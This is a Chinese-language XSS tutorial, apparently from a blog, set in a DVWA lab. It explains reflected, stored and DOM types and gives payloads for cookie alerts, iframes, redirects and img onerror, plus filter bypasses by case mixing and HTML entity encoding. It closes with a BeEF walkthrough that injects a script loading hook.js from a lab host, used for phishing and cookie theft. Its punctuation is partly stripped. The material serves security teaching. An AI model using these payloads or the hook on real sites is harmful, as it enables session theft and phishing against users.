新手学做网站书,saas系统销售好做吗,网站建设价格表,网络服务的服务提供者包括( )XSS跨站脚本攻击
#xff08;1#xff09;简介
OWASP TOP 10 之一#xff0c;XSS被称为跨站脚本攻击#xff08;Cross-Site-Scripting#xff09;主要基于JavaScript#xff08;JS#xff09;完成攻击行为XSS通过精心构造JS代码注入到网页中#xff0c;并由浏览器解释…XSS跨站脚本攻击
1简介
OWASP TOP 10 之一XSS被称为跨站脚本攻击Cross-Site-Scripting主要基于JavaScriptJS完成攻击行为XSS通过精心构造JS代码注入到网页中并由浏览器解释运行这段代码以达到恶意攻击的效果。用户访问被XSS脚本注入的网页XSS脚本就会被提取出来用户浏览器解析这段XSS代码即用户被攻击了收集用于信息收入的地方都有可能被注入XSS代码只要没对用户输入存在严格的过滤都可能被XSS
2危害
盗取各类账号如机器登录账号、用户网银账号、各类管理员账号控制企业数据如读取、篡改、添加企业敏感数据的能力盗窃企业重要的具有商业价值的资料非法转账强制发送电子邮件网站挂马更多人受害控制受害者机器向其他机器发起攻击卖肉机
3分类
1 反射型
非持久跨站脚本攻击攻击是一次性的仅对当次访问页面产生影响
攻击流程
2 存储型
持久性跨站点脚本攻击者的数据存储在服务端攻击行为伴随攻击数据一直存在
攻击流程
3 DOM型
既有可能是反射型也有可能是存储型基于文档对象模型Document Object ModelDOM的一种漏洞
4产生原因
web应用对用户输入过滤不严谨攻击者写入恶意的脚本代码到网页中用户访问含恶意代码的网页恶意脚本被浏览器解析执行导致用户被攻击
5构造XSS脚本
1 基础
常用html标签
iframe创建包含另一个文档的内联框架textarea定义多行文本输入控件img网页中嵌入图像script定义客户端脚本比如JavaScript script标签即可包含脚本语句也可通过src属性指向外部脚本文件 type属性规定脚本类型 ---必需JavaScript常见应用是图像操作、表单验证以及动态内容更新 常用js脚本
alert用于显示带有一条指定消息和一个确认按钮的警告框window.location获取当前页面地址URL并将浏览器重定向到新页面location.href返回当前显示文档的完整URLonload一张页面或图像完成加载onsubmit一个按钮被点击onerror加载文档或图像发生错误
2 构造脚本方式
弹窗警告
例1显示弹窗 -- scriptalert(欢迎12345)/script 例2获取用户cookie -- scriptalert(document.cookie)/script 页面嵌套
例iframe styleoverflow:hidden;width:520px;height:400px;positon:fixed;left:500px;top:400px;border:none;margin:0px;padding:0px; src http://127.0.0.1:/dvwa-master//iframe 页面重定向
例1scriptwindow.locationhttps://www.douyin.com//script 例2scriptlocation.hrefhttps://www.bilibili.com//script 弹窗警告并且重定向
例scriptalert(请移步到我们新站点);location.hrefhttp://www.baidu.com//script 图片标签利用图像标签有一定隐蔽性
例img src# οnerrοr欢迎来钓鱼 访问恶意网站代码网站种马
诱导用户访问恶意网站的攻击文件xss.js比如获取用户cookie稍后通过BeEF建立恶意站点
绕开过滤脚本
[1] 大小写例SCriptalert(xss)/ScrIpt
[2] 字符编码采用URL、base64、html等编码
例采用html实体编码
img srcx οnerrοr#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041 等同于img srcx onerrer”javascript:alert(XSS)” 存储型XSS演示
每个访问页面的人都会弹出这个对话框
6自动XSS攻击详解
1 BeEF
[1] 简介Browser Exploation FrameworkBeEF是目前强大的浏览器开源渗透测试框架通过XSS漏洞配合JS脚本和Metasploit进行渗透。BeEF是基于Ruby编写的支持图形化界面较为简单
http://beefproject.com/ [2] 功能
1信息收集
网络发现主机信息cookie获取会话劫持键盘记录插件信息
2持久化控制
确认弹框小窗口中间人
3社会工程
点击劫持弹窗警告虚假页面钓鱼页面
4渗透攻击
内网渗透MetasploitCSRF攻击DDOS攻击
2 利用beef进行XSS自动攻击
1、打开beef
2、web界面打开并登入
3、在DVWA中植入XSS脚本DVWA清空缓存植入script srchttp://192.168.174.131:3000/hook.js/script
4、其他机器访问被攻击机的DVWA页面 127.0.0.1是其他机器192.168.174.1是被攻击机本机访问肉机上线
5、社工攻击范例
命令的颜色区别
绿色对目标主机生效且不可见不会被发现橙色对目标主机生效但可能可见可能被发现灰色对目标主机未必生效可验证红色对目标主机不生效 附社工攻击
1、pretty theft攻击
2、中招页面
3、beef查看搜集信息
